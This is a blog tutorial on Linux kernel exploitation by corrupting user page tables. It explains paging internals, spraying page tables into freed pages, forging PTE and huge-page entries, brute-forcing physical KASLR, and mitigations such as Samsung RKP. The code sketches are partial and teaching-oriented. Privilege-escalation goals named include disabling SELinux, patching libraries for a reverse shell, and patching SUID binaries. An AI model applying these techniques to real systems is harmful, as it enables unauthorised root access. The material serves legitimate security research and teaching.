Kernel Exploitation Techniques: Turning The (Page) Tables

Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.

So today we'll be looking at (user) page table exploitation. If you've been keeping up with some of the great kernel exploitation research put out there lately (which I'll be sharing plenty of in this article, don't worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.

The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We'll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and mitigations to be aware of.

As I mentioned, there's a plethora of great research out there, so where relevant I'll be linking to them so you can take a deeper dive into specific topics or approaches. At the end of the post I'll include a section grouping all the relevant public research together.

So without further ado, let's get stuck in!

Paging Primer

he's looking at pages, get it?

Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what page tables are, so we understand why exploiting them is so powerful.

Let's pick up where we left off with my three-part series on virtual memory; if you're not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section.

Okay, so, we have this general idea of the virtual memory model. Let's take the simple example of running a program, which we've touched on previously:

  • First, the program itself is stored on disk and must be read
  • It is loaded into RAM, where the physical address in memory is mapped into our process' virtual address space
  • This "mapping" means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed

Page tables are what facilitate the translation of virtual to physical addresses. Why "page" tables? Recall that virtual memory is divided into "pages" which are PAGE_SIZE (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.

Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?

Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels[1]:

  • Page Global Directory (PGD): Each entry in this table points to a P4D
  • Page Level 4 Directory (P4D): Each entry in this table points to a PUD
  • Page Upper Directory (PUD): Each entry in this table points to a PMD
  • Page Middle Directory (PMD): Each entry in this table points to a PT
  • Page Table (PT): Each entry (PTE) points to a page of physical memory

Note that a lot of systems still use 4-level page tables. In the event a page table level isn't used (e.g. the P4D is only needed for 5-level paging), it is "folded", AKA skipped.

Okay, that sounds fairly straightforward right? And to add to the page-ception, each of these tables is PAGE_SIZE bytes. But how do these facilitate address translation?

Overview of page table structure (Linux x86_64) by Hiroki Kuzuno, Toshihiro Yamauchi [1]

That's where this helpful diagram comes in! Let's unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.

Looking up, we have the bits that make up a 64-bit x86_64 virtual address. Notice that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn't that neat?!

There are a few extra details to note here. First, keen readers might notice that we're actually only using the lower 48 bits of the virtual address! What's that Sign extended portion? As addresses are still treated and handled as canonical 64-bit values, the remaining bits 48-63 are sign extended, i.e. copies of bit 47.

Bit 47 is important, as it denotes whether an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don't believe me? Compare a kernel and userspace address on your x86_64 machine and you'll always see those bits set/unset.
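To make that bit layout concrete, here's a minimal sketch (my own illustration, not from any of the linked research) that pulls the table indices out of a virtual address, assuming the standard 4-level x86_64 split of 9 bits per level plus a 12-bit page offset:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    /* Arbitrary userspace address, purely for demonstration */
    uint64_t addr = 0x00007ffc1234abcdUL;

    /* 4-level x86_64: bits 39-47 index the PGD, 30-38 the PUD,
     * 21-29 the PMD, 12-20 the PT, and bits 0-11 are the page offset */
    printf("pgd index:   %llu\n", (unsigned long long)((addr >> 39) & 0x1ff));
    printf("pud index:   %llu\n", (unsigned long long)((addr >> 30) & 0x1ff));
    printf("pmd index:   %llu\n", (unsigned long long)((addr >> 21) & 0x1ff));
    printf("pt index:    %llu\n", (unsigned long long)((addr >> 12) & 0x1ff));
    printf("page offset: 0x%llx\n", (unsigned long long)(addr & 0xfff));

    return 0;
}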

Some more useful bits (figuratively speaking) worth mentioning are that:

  • Page table entries aren't just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert).
  • It's not just PTEs that can point to physical memory. There's a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).
  • The kernel's page tables are set up at boot time. A process' page tables are set up when it's created. It used to be the case that the kernel's page tables were copied into each process' tables (remember, they span mutually exclusive virtual address ranges).
  • However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, CONFIG_PAGE_TABLE_ISOLATION / CONFIG_MITIGATION_PAGE_TABLE_ISOLATION) was introduced. This removes the kernel mappings from userspace, switching to a separate page table with all the mappings when entering "kernel mode" (i.e. during a syscall or interrupt).

I'll touch on all of this in much more detail in the next instalment of my memory management linternals series, but there's also plenty of great resources out there[1][2].


  1. https://docs.kernel.org/mm/page_tables.html
  2. https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md

Exploitation

Alright, now we're getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target.

Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to.

When we think of Kernel Address Space Layout Randomisation (KASLR), we're typically thinking about the virtual address of the kernel. Physical KASLR is slightly different: it may be weaker, or not present at all (as is the case for upstream aarch64).

Therefore, control over a PTE belonging to our process essentially grants us an arbitrary physical address read and write, giving us control over the kernel while also bypassing mitigations that hinder other techniques.

But of course, this is all easier said than done! First we have to control a PTE...

So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:

  • How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to reach them
  • Are there generic approaches to gain a page table corruption primitive?
  • How do we want to leverage our page table corruption for local privilege escalation?

User Page Table Allocation

If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel's page tables are setup during boot-time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.

I'll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: when a virtual address within a valid mapping is first accessed (read or written), any missing page tables along its translation path are allocated and populated.

We can use some maths to trigger this reliably. Recall that each page table is PAGE_SIZE bytes. On a 64-bit system, entries are 64 bits. That means each page table has 4096 / 8 = 512 entries. We can then work out the virtual address range each page table level spans:

  • PTE-level table: Each of the 512 entries points to PAGE_SIZE bytes of physical memory. Therefore it spans 512 x 4096 = 2097152 = 0x200000 = 2MB.
  • Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans 512 x 2MB = 0x40000000 = 1GB.
  • This continues with the PUD spanning 512GB, the PGD spanning 256TB.

We can infer from this that the virtual address mapped by the first entry of a PTE-level table is aligned to 0x200000. If we mmap() a page of anonymous memory at a fixed address aligned to this value, we can determine a few things (demonstrated in the sketch after this list):

  • This virtual address' mapping will be the first entry in its PTE-level table
  • If there haven't been any other mappings in this page table (i.e. for the next 0x200000 - 0x1000 bytes), then this page table hasn't been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.
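Here's a minimal sketch of that idea; the fixed address is just an arbitrary 2MB-aligned value I've picked for illustration, assuming nothing else is mapped in that 2MB range:

#include <string.h>
#include <sys/mman.h>

/* Arbitrary, hypothetical 2MB-aligned address used purely for illustration */
#define TARGET ((void *)0x13370000000UL)

int main(void)
{
    /* Map a single page at a 2MB-aligned fixed address. If nothing else is
     * mapped in this 2MB range, no PTE-level table exists for it yet. */
    void *p = mmap(TARGET, 0x1000, PROT_READ | PROT_WRITE,
                   MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED)
        return 1;

    /* Touching the page faults it in: the kernel walks the paging hierarchy
     * and allocates the missing (order-0) PTE-level table on the way */
    memset(p, 'A', 0x1000);

    return 0;
}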

Another quirk to note is that mmap() can be passed the MAP_POPULATE flag to populate the necessary page tables at the time the mapping is created.

With that mildly relevant tangent out of the way, let's look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For x86_64 our trail starts here:

gfp_t __userpte_alloc_gfp = GFP_PGTABLE_USER | PGTABLE_HIGHMEM;

pgtable_t pte_alloc_one(struct mm_struct *mm)
{
	return __pte_alloc_one(mm, __userpte_alloc_gfp);
}
arch/x86/mm/pgtable.c

Note the GFP flags used: GFP_PGTABLE_USER | PGTABLE_HIGHMEM. A few calls deeper we then get to the asm-generic implementation, pagetable_alloc_noprof():

/**
 * pagetable_alloc - Allocate pagetables
 * @gfp:    GFP flags
 * @order:  desired pagetable order
 *
 * pagetable_alloc allocates memory for page tables as well as a page table
 * descriptor to describe that memory.
 *
 * Return: The ptdesc describing the allocated page tables.
 */
static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
{
	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);

	return page_ptdesc(page);
}
include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)

As we can see user page tables are allocated using the page allocator, with GFP flags GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP. Okay, one step closer!

Now we know we're dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let's explore this a bit:

GPUAF slides by PAN ZHENPENG & JHENG BING JHONG

Above is a diagram showing some page allocator internals. Recall that the page allocator manages chunks of physically contiguous memory by order, where the size of a chunk is 2^order * PAGE_SIZE.

Free memory chunks are managed by the free_area list, whose index is the order of the free chunks of memory it manages. Each order then has a free_list for each of the MIGRATE_TYPES, which points to the actual memory chunks. Working our way back you'll then notice each zone has its own free_area list... Not to mention each CPU maintains its own per-CPU page cache... So yeah, that's a lot.

This means when we're doing any kind of page allocator-level corruption we need to be aware of all the variables: the CPU cache, zone, migrate type etc.

In our situation: Our page table is PAGE_SIZE bytes, so a single order 0 page. The GFP flags determine the zone and migrate type. Let's quickly walk through those:

  • GFP_PGTABLE_USER, after peeling back the macros, is __GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT. With neither __GFP_RECLAIMABLE nor __GFP_MOVABLE set, that means MIGRATE_UNMOVABLE[1].
  • PGTABLE_HIGHMEM is effectively 0 unless CONFIG_HIGHMEM is set.
  • __GFP_COMP is for compound pages[2], but doesn't affect our zone/migrate type.

So to sum it all up: page tables are order-0 pages allocated by the page allocator, from ZONE_NORMAL, MIGRATE_UNMOVABLE.

Page Table Corruption?

Okay, we know what page tables are, why they're powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!

The vulnerability research gods are fickle ones and we're often at the whims of the primitives we're given. So let's explore a few cases and how we might leverage them to get control of a page table.

Page-Level Primitives

By far the "easiest" way would be if we had a nice order-0 page use-after-free (UAF), with suitable zone and migrate types. In this scenario, we could do some classic memory fengshui to have our page reallocated as a page table.

Even if it isn't an order-0 page UAF: due to the buddy algorithm, if we exhaust the order-0 free lists the allocator will split order-1 pages, and if those are exhausted then order-2, and so on. A similar technique could be used to exploit a page allocator-level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table.

I thought I'd share some cool public research demonstrating this; funnily enough, page-level UAFs aren't too common, so both examples are from GPU bugs (see the GPU exploit slides in the Resources section at the end).

What About Other Primitives?

But what if we don't have a nice page-level UAF? What if we've got a run of the mill SLAB allocator-level UAF? Is there any hope for us?! Yes!

As an avid reader of my linternals series, I'm sure you'll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator!

Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We'd need to be mindful of the slab's order (aka size) and what write primitives we can get with our UAF in order to corrupt the page table's contents, but it's certainly doable.

How do I know? Because this is the crux of the Dirty Pagetable technique published by @NVamous back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!
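To give a feel for the shape of such an exploit (this is only my rough, hypothetical outline, not the writeup's actual code; the two stub functions stand in for whatever bug and spray strategy a real exploit would use), the flow looks something like this:

#include <sys/mman.h>

#define PT_SPAN   0x200000UL /* virtual memory covered by one PTE-level table */
#define SPRAY_CNT 512

/* Placeholder stubs: in a real exploit these would drive the actual bug */
static void free_every_object_in_victim_slab(void) { /* bug-specific */ }
static void write_through_dangling_reference(void) { /* bug-specific */ }

int main(void)
{
    /* 1. Empty the victim slab, so the whole slab page is handed back to
     *    the page allocator */
    free_every_object_in_victim_slab();

    /* 2. Spray user page tables: each 2MB-aligned region we map and populate
     *    demands a fresh order-0 PTE-level table, hopefully reclaiming the
     *    page we just freed */
    for (unsigned long i = 0; i < SPRAY_CNT; i++)
        mmap((void *)(0x50000000000UL + i * PT_SPAN), 0x1000,
             PROT_READ | PROT_WRITE,
             MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);

    /* 3. Trigger the UAF write again: if the reclaim worked, we're now
     *    corrupting page table entries rather than a slab object */
    write_through_dangling_reference();

    return 0;
}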

In a similar vein, PageJack was published in 2024 (Phrack article, BlackHat slides) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen & Zhiyun Qian. This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific "bridge objects" which when freed cause a page UAF.

Some more writeups demonstrating these techniques are listed in the Resources section at the end.

Exploiting A Page UAF?

The pieces are finally aligned: we know what page tables are, why they're a big deal and now we even know how to get control of them ... but what do we do with all this power?!

As I mentioned earlier, we're often at the whim of whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can't cover all eventualities, hopefully this section provides enough information to figure it out.

So we have, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what's next?

PT Entries

First things first, we want to understand what we're corrupting - what does our page table actually contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve?

x86_64 PT Entry from OSDev.wiki

Above is a diagram of what an 8 byte PT entry looks like on x86_64. Here M is the maximum physical address bit, i.e. how many bits are used for physical addressing. Much like the virtual address width we touched on earlier, this isn't actually 64, but a smaller, CPU-dependent value (e.g. 46).

So this is a pretty smart use of space. As we know, these entries map pages of memory (i.e. PAGE_SIZE bytes), so all addresses are page aligned. With a page size of 0x1000, this means bits 0-11 are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.

Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our process's virtual address space. So we're interested in (see the decoding sketch after this list):

  • The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.
  • The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table.
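As a quick illustration of those bits, here's a sketch that decodes an x86_64 PTE value (the example value is one we'll run into during the debugging walk later on); bits 0 (present), 1 (writable), 2 (user-accessible) and 63 (no-execute) are the ones we care about most:

#include <stdint.h>
#include <stdio.h>

#define PTE_PRESENT (1ULL << 0)
#define PTE_RW      (1ULL << 1)
#define PTE_USER    (1ULL << 2)
#define PTE_NX      (1ULL << 63)
#define PTE_ADDR    0x000ffffffffff000ULL /* bits 12-51: physical page frame */

int main(void)
{
    /* R/W anonymous mapping entry from the page table walk later in the post */
    uint64_t pte = 0x8000000107422067ULL;

    printf("phys addr: 0x%llx\n", (unsigned long long)(pte & PTE_ADDR));
    printf("present=%d writable=%d user=%d nx=%d\n",
           !!(pte & PTE_PRESENT), !!(pte & PTE_RW),
           !!(pte & PTE_USER), !!(pte & PTE_NX));

    return 0;
}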

Huge Pages

As we've touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF.

That said, in their default use case, this would be less practical than corrupting a PT. A PT entry would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables ... apart from huge pages!

x86_64 PUD, PMD and PT Entry from OSDev.wiki

The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (PS) attribute. If this bit is set, the entry is treated as mapping a huge page of physical memory, whose size depends on the page table level.

As we covered earlier, for a PMD this is 2MB and for a PUD it's 1GB. As the physical addresses are aligned to the size of the mapping, the PMD entry has even fewer address bits than the PT entry, and the PUD fewer still.
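For example, here's a hedged sketch (my own, assuming the x86_64 layout from the diagram above, where PS is bit 7) of what forging a PMD entry that maps a 2MB huge page might look like:

#include <stdint.h>
#include <stdio.h>

#define PDE_PRESENT (1ULL << 0)
#define PDE_RW      (1ULL << 1)
#define PDE_USER    (1ULL << 2)
#define PDE_PS      (1ULL << 7) /* Page Size: this entry maps a huge page directly */

/* Forge a PMD entry mapping a 2MB huge page at `phys` (2MB-aligned),
 * instead of pointing at a PTE-level table */
static uint64_t make_huge_pmd_entry(uint64_t phys)
{
    return (phys & ~0x1fffffULL) | PDE_PS | PDE_PRESENT | PDE_RW | PDE_USER;
}

int main(void)
{
    /* e.g. an entry mapping the 2MB of physical memory starting at 0x40000000 */
    printf("pmd entry: 0x%llx\n",
           (unsigned long long)make_huge_pmd_entry(0x40000000ULL));
    return 0;
}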

Going For A Walk

So far this has all been quite abstract, so, if you'll indulge me, let's go for a quick (page table) walk. We'll take all the paging internals we've picked up so far and do some debugging, to get some hands-on experience and confirm what we've learned.

For our little walk, I'm going to use the following program to setup an interesting virtual address space to explore via kernel debugging:

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define PAGE_SIZE (0x1000UL)
#define PT_SIZE (512 * PAGE_SIZE) // 0x200000
#define PMD_SIZE (512 * PT_SIZE)  // 0x40000000
#define PUD_SIZE (512 * PMD_SIZE) // 0x8000000000
#define PGD_SIZE (512 * PUD_SIZE) // 0x1000000000000

int main()
{
    int fd = open("test.txt", O_RDONLY);

    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, fd, 0);

    getchar(); // pause program so i can set a bp to trigger on the next mmap()
    mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    return 0;
}
Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them

The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?

Because, as we've learned, the virtual address space is directly reflected by its page tables. So by using a fixed address we can calculate exactly which PT our page entries will be in.

To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address 0x0 is going to be mapped by PGD[0][0][0][0] - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.

So if we map at fixed address PUD_SIZE + PMD_SIZE + PT_SIZE we're offsetting it by exactly one PUD, one PMD and one PT. So we should find it at PGD[1][1][1][0].

We can also do it the technical way and explore the bits of the address. PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000. Let's check out the bits:

Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0

Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0

In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits 39-47, 30-38, 21-29 and 12-20 respectively.  Here we can see those values correspond to 1, 1, 1 and 0. The same as our previous guess!

Note that the next two mappings are each offset by PAGE_SIZE, i.e. one PT entry, so they should form 3 contiguous PT entries.

This is all still theoretical though, so let's put our money where our mouth is. I set up a kernel debugging environment using gdb and x86_64 QEMU. The plan is to:

  • Run this program on the guest
  • When it pauses at getchar(), set a breakpoint in gdb at vm_area_alloc(mm)
  • Continue the program, hit the breakpoint. We now, lazily, have a reference to our process's mm_struct, which contains a pointer to its PGD. We can now walk our PGD and find our entries!

And, just like that, we can dump our process's PGD:

(gdb) x/10gx mm->pgd
0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
0xffff888106b50010:     0x0000000000000000      0x0000000000000000
0xffff888106b50020:     0x0000000000000000      0x0000000000000000

Great, so far so good. We can see PGD[1] is populated with 0x8000000102c9b067. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: 0x8000000102c9b067 & 0x0000FFFFFFFFF000 =  0x102C9B000.

Awesome, so now we can move onto our PUD...

(gdb) x/10gx 0x102C9B000
0x102c9b000:    Cannot access memory at address 0x102c9b000

Ah wait, that's a physical address right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the kernel virtual address space includes a direct mapping of all physical memory (the physmap). For x86_64 this is at __PAGE_OFFSET, 0xffff888000000000.

Sooo if that's the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PUD...

(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
0xffff888102c9b000:     0x0000000000000000      0x000000010436d067

Voila! And again, as expected, we have our entry at PGD[1][1]. Let's keep going:

(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 & 0x0000FFFFFFFFF000))
0xffff88810436d000:     0x0000000000000000      0x0000000101346067

Now we're into the PMD and as expected, we see PGD[1][1][1] populated. The next step is the PT, where we should see three entries with slightly different permissions:

(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 & 0x0000FFFFFFFFF000))
0xffff888101346000:     0x8000000107422067      0x80000000034ff225
0xffff888101346010:     0x800000010743c025      0x0000000000000000

And just like that we've walked our mm's PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!

I'll leave the examining of the various attributes, using the PTE diagram from the previous section, as an exercise to any interested readers, as I fear I've sidetracked enough. The main goal of this little adventure is to demonstrate how you can get some hands on debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!

Now, where were we - weighing up our options for exploitation if we have some level of control over a page table...

Approaches

So, depending on our primitive, here are a couple of options we might consider:

  • Overwriting the address bits (and maybe the Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we'll discuss phys KASLR later). A sketch of this follows the list.
  • Overwriting permission bits to gain R/W on a privileged file that is mapped into our process's virtual address space as read-only.
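Here's a minimal sketch of the first option, assuming the x86_64 PTE layout from earlier; write_to_uaf_page() is a hypothetical stand-in for whatever corruption primitive your bug actually gives you over the freed page that now backs the page table:

#include <stddef.h>
#include <stdint.h>

#define PTE_PRESENT (1ULL << 0)
#define PTE_RW      (1ULL << 1)
#define PTE_USER    (1ULL << 2)

/* Hypothetical: however your primitive lets you write into the UAF'd page */
static void write_to_uaf_page(size_t offset, uint64_t value)
{
    (void)offset; (void)value; /* bug-specific */
}

/* Point entry `index` of the corrupted PTE-level table at an arbitrary
 * physical page, present + writable + user. The virtual address our process
 * has mapped through that entry now reads/writes that physical page directly. */
void remap_entry_to_phys(unsigned int index, uint64_t phys)
{
    write_to_uaf_page(index * sizeof(uint64_t),
                      (phys & ~0xfffULL) | PTE_PRESENT | PTE_RW | PTE_USER);
}

In practice you'd then access the corresponding virtual address in your process to read or write the target physical page (keeping the caching caveats below in mind).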

Using our kernel AAW we could: disable SELinux using one of the techniques outlined here, such as overwriting the selinux_state singleton[3][4]; patch the kernel to gain root (e.g. setresuid(), setresgid())[5][6]; overwrite modprobe_path, because that's sometimes still a thing[7]; or follow the linked list of tasks from init_task to elevate the privileges of our own creds or forge init's, etc. The world is our oyster (if our primitive is flexible enough...)!

As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell[8][9][10]; patch SUID binaries to gain a privileged shell etc.

On Caching

Before we get giddy with power, beyond the limitations of our primitive, there are a few other things to consider: mitigations (which I'll cover in the next section) and caching.

So far we've covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address.

This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up and also inefficient if we're constantly accessing the same pages of memory.

To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages.  

If we start messing with page table entries or pages, in order for the hardware to actually see these changes, we need to flush the appropriate caches so they're updated with our version.

Of the write-ups I've mentioned so far, the Dirty Pagetable article has a section on this for aarch64 and the Flipping Pages article has a section covering x86_64.


  1. https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16
  2. https://lwn.net/Articles/619514/
  3. https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux
  4. https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux (aarch64)
  5. https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel (aarch64)
  6. https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail (x86_64)
  7. https://sam4k.com/like-techniques-modprobe_path/
  8. https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso (aarch64)
  9. https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process (aarch64)
  10. https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive (aarch64)

Mitigations

Alright, we've had our fun, now it's time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps many of the more common mitigations: virtual KASLR, CFI, random kmalloc caches and other heap mitigations (and it doesn't need modprobe_path); not to mention the permissions set up by page tables to protect memory accesses via virtual addresses. However, that's not to say there's nothing to worry about.

Physical KASLR

As I mentioned earlier, usually when we're talking about Kernel Address Space Layout Randomisation (KASLR), we're referring to kernel virtual address randomisation. However, as we're dealing with physical addresses, we're interested in physical KASLR.

CONFIG_RANDOMIZE_BASE is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:

In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.

On 64-bit, the kernel physical and virtual addresses are randomized separately.

Now, let's look at the aarch64 description:

Randomizes the virtual address at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.

As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you're on Android, you're not out of the woods yet - Samsung have their own physical KASLR implementation, so don't stop reading just yet.

For x86_64, the kernel's default physical base address is CONFIG_PHYSICAL_START (0x1000000 by default). With KASLR, the randomised physical address is aligned to CONFIG_PHYSICAL_ALIGN, which is typically set to 0x200000 (the minimum value on x86_64).

Sooo how we approach this is going to depend on our primitive and whether we have control of a PT, PMD, PUD etc. But failing any context-specific leaks, the most straightforward approach is simply brute forcing the available physical memory: taking advantage of the alignment restrictions, we check each possible base address for known kernel signatures, either by updating PT entries one page at a time or by mapping huge pages of physical memory and scanning those.
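As a rough sketch of what that brute force might look like (remap_window_to() and window are hypothetical wrappers around the PTE-overwrite primitive sketched earlier, and the signature is something you'd extract from the target kernel build beforehand):

#include <stdint.h>
#include <string.h>

#define PHYS_ALIGN 0x200000UL  /* CONFIG_PHYSICAL_ALIGN */
#define PHYS_MAX   (4UL << 30) /* assume <= 4GB of RAM for this sketch */

/* Hypothetical: repoint one of our corrupted PTEs at the given physical page;
 * `window` is the userspace virtual address that PTE translates */
extern void remap_window_to(uint64_t phys);
extern volatile uint8_t *window;

uint64_t find_kernel_phys_base(const void *signature, size_t sig_len)
{
    for (uint64_t phys = 0; phys < PHYS_MAX; phys += PHYS_ALIGN) {
        remap_window_to(phys);
        /* NB: in practice we also need to make sure there's no stale TLB
         * entry for `window` between iterations, see the caching section */
        if (!memcmp((const void *)window, signature, sig_len))
            return phys;
    }
    return 0; /* not found */
}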

Read-Only Memory

Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we're dealing directly with physical addresses here, who's going to stop us?! As we've mentioned, typically these protections are done during virtual address translation, but we're bypassing that, so what gives?

An example of this is Samsung's Real-time Kernel Protection (RKP), a hypervisor implementation which is part of Samsung KNOX. I don't want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.

Moreover, it uses 2-stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only, so that even with our physical address read/write, our accesses can still be caught by the hypervisor, as it's operating at a higher privilege level. This is a gross simplification, so if you're interested in reading more, check out the awesome Samsung RKP Compendium.

This can in turn be used to protect critical data structures such as SLAB caches (e.g. cred_jar), global variables, kernel page tables etc.

Note this isn't currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write.

Resources

Below is a list of all the resources I've linked throughout the article, plus any extras that are relevant to the topic of page table exploitation (if you think I've missed any, lmk!):

  1. Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel by @NVamous (2023) (aarch64) technique overview with 3 examples
  2. "Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup" by @ptrYudai (2023) (x86_64) exploit write-up
